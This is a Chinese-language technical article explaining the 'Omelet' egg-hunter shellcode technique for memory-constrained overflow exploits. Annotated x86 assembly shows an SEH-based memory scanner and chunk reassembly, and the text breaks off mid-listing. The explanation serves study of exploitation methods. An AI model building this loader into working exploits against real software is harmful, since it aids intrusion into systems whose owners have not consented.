Shellcode分段执行技术原理

作者：riusksk（泉哥）
主页：http://riusksk.blogbus.com

前言
由于在实际溢出利用中，我们可能会遇到内存中没有足够的空间来存放我们的shellcode，但我们又可以控制多块小内存空间的内容，那些此时我们就可使用shellcode分段执行技术来进行利用，这种方法在国外被称为“Omelet Shellcode”，属于egg hunt shellcode的一种形式，它先在用户地址空间中寻找与其相匹配的各个小内存块（egg），然后再将其重构成一块大块的shellcode，最后执行它。此项技术最初是由荷兰著名黑客SkyLined在其主页上公布的（具体代码参见附件），该黑客先前就职于Microsoft，但于2008年初转入Google，同时他也是著名的字母数字型shellcode编码器Alpha2 / Alpha3的开发者。

原理分析
  将Shellcode拆分成固定大小的多个代码块，各个代码块中包含有其字节大小size，索引值index，标记marker（3 字节）和数据内容data，如图1所示：

 
            图1
当egghunter代码开始执行时，它会在用户内存空间中（0x00000000~0x80000000）搜索这些被标记的小块，然后在内存中重构成最初的shellcode并执行它。而当shellcode执行时，它还会安装SEH以处理访问违例时的情况。若出现访问违例，则SEH handler会将地址与0xFFF进行或运算，然后再加1，相当于进入下一内存页，以跳过不可读取的内存页。如果搜索的内存地址大于0x7FFFFFFF，那么终止搜索，并在内存中重构shellcode用于执行，否则重置栈空间，防止因递归进行异常处理而将栈空间耗尽，它会重新设置SEH handler并继续搜索内存。相应代码如下：

代码:
reset_stack:
; 重置栈空间以防止递归进行异常处理时耗尽栈空间，并设置自己的异常处理例程以处理扫描内存时出现的访问违例情况
    XOR     EAX, EAX                    ; EAX = 0，并作为计数器
    MOV     ECX, [FS:EAX]               ; ECX = SEH结构链表
find_last_SEH_loop:
    MOV     ESP, ECX                    ; ESP = SEH结构
    POP     ECX                         ; ECX = 下一个SEH结构指针
    CMP     ECX, 0xFFFFFFFF             ; 判断是否是最后一个SEH结构
    JNE     find_last_SEH_loop          ; 不是则跳走并继续查找
    POP     EDX                         ; 最后一个SEH结构中的异常处理例程handler
    CALL    create_SEH_handler          ; 自定义SEH handler

SEH_handler:
    POPA                                ; ESI = [ESP + 4] -> struct exception_info
    LEA     ESP, [BYTE ESI+0x18]        ; ESP = struct exception_info->exception_address
    POP     EAX                         ; EAX = exception address 0x????????
    OR      AX, 0xFFF                   ; EAX = 0x?????FFF
    INC     EAX                         ; EAX = 0x?????FFF + 1 -> next page
    JS      done                        ; EAX > 0x7FFFFFFF ===> done
    XCHG    EAX, EDI                    ; EDI => next page
    JMP     reset_stack
当从地址0x00000000开始搜索后，若找到以相匹配的egg_size开头的egg内存块，它会将接下的DWORD值与一个特殊值（3字节的标记值和1字节的0xFF）相异或，如果是我们要找的egg内存块，那么获取的结果会等于内存块的索引号（从0开始），比如第二块egg内存块的这个DWORD值为0xBADA55FE，那么它与0xBADA55FF相异或后值为1。如果不是相匹配的egg内存块，则继续搜索下一字节。对应的代码如下所示：

代码:
create_SEH_handler:
    PUSH    ECX                         ; 指向下一个SEH结构，这里为0xFFFFFFFF
    MOV     [FS:EAX], ESP               ; 设置当前的SEH为自定义的SEH_handler
    CLD                                 ; 清除方向标志位DF，从0开始扫描内存
scan_loop:
    MOV     AL, egg_size                ; EAX = egg_size
egg_size_location equ $-1 - $$
    REPNE   SCASB                       ; 从地址0x00000000开始循环扫描以egg_size字节开头的内存块
    PUSH    EAX                         ; 找到后保存egg_size
    MOV     ESI, EDI                    ; ESI = 相匹配内存块的地址
    LODSD                               ; EAX = II M2 M3 M4，索引值（1字节）与标记值（3字节）
    XOR     EAX, (marker << 8) + 0xFF   ; EAX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
marker_bytes_location equ $-3 - $$
    CMP     EAX, BYTE max_index         ; 检测EAX值是否小于 max_index
max_index_location equ $-1 - $$
    JA      reset_stack                 ; 不是则跳走并继续搜索内存
找到egg内存块后，将内存块大小egg_size与索引值egg_index相乘可得到该内存块在原始shellcode中的偏移egg_offset，然后将它再加上存放shellcode的栈空间起始地址，最后得到绝对地址，并将该egg内存块复制到绝对地址上，直至所有的egg内存块全部复制到栈上，进而在栈上重构出完整的shellcode。其对应代码如下：

代码:
    POP     ECX             &nb